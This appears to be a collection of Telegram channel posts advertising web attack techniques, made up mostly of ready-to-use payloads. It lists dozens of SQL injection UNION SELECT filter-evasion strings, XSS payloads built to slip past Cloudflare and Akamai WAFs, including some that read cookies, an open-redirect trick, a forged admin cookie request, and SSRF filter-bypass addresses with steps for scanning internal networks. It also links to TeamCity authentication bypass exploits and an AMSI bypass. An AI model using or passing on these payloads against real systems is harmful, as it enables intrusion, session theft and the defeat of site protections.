NoMore403

Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites:
Before you install and run nomore403, make sure you have the following:

Go 1.15 or higher installed on your machine

Installation:

cd nomore403
go get
go build

Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage:

./nomore403 -h

Github

⬇️ Download
🔒 LearnExploit

#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Bypass open redirection whitelisted using chinese dots:

%E3%80%82

Tip: Keep eyes on SSO redirects

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Bypass SQL union select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

bypass XSS Cloudflare WAF

Encoded Payload:

"><track/onerror='confirm\%601\%60'>

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army

find an admin panel bypass using (admin=1).

/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value)  -->  Set-Cookie:admin=;

Bypass request:

GET /admin HTTP/1.1
Cookie:admin=1;

#Trick #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

A cloudflare verification bypass script for webscraping

Github

#cloudflare #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass

LearnBox:
1_Exploits
2_Video

#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3

Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Xss Payload

<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

#xss #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite

Link

#Writeup #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

CloudFlare XSS protection WAF Bypassed 💎

<Img Src=OnXSS OnError=confirm(document.cookie)>

#WAF #XSS #Bypass #CloudFlare
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Bypassed strong Akamai WAF

payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

#Waf #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS

Github

#Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

payload to bypass Akamai WAF

?foobar=<foo%20bar=%250a%20onclick=<your js code>

#WAF #Bypass #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

SSRF Payloads To Bypass Firewall

Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):

1) Bypass SSRF with CIDR:
http://127.127.127.127
http://127.0.0.0

2) Bypass using rare address:
http://127.1
http://0

3) Bypass using tricks combination:
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3

4) Bypass against a weak parser:
http://127.1.1.1:80\@127.2.2.2:80/

5) Bypass localhost with [:]:
http://[::1:80/
http://0000::1:80/

Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:

Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.

For example:
We discover that the following URL works:

https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000

We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network

#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit